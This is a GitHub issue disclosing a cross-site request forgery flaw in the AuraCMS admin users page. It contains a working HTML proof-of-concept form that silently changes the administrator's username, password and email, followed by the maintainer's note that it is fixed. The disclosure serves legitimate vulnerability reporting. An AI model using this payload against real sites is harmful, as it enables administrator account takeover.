search

auracms / AuraCMS

Indonesia Content Management System
http://auracms.org
1 stars 4 forks source link

Cross-site request forgery in admin page #2

Open FuryKangaroo opened 6 years ago

FuryKangaroo commented 6 years ago

There is a cross-site request forgery vulnerability in admin.php?mod=users It and can change administrator's password. First: After the administrator logged in,open the poc page. Aura.txt to Aura.html --> change administrator's password. image Second: Check the results after modifying the password. image Success! CSRF POC: Aura.txt

<html>
  <!--POC-->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/test/06AuraCMS-master/admin.php?mod=users&action=edit&id=1&referer=%2Ftest%2F06AuraCMS-master%2Fadmin.php%3Fmod%3Dusers" 
    method="POST" enctype="multipart/form-data">
      <input type="hidden" name="username" value="user" />
      <input type="hidden" name="password" value="user1234" />
      <input type="hidden" name="email" value="user&#64;qq&#46;com" />
      <input type="hidden" name="name" value="Administrator" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
auracms commented 6 years ago

Thanks, i have fix this!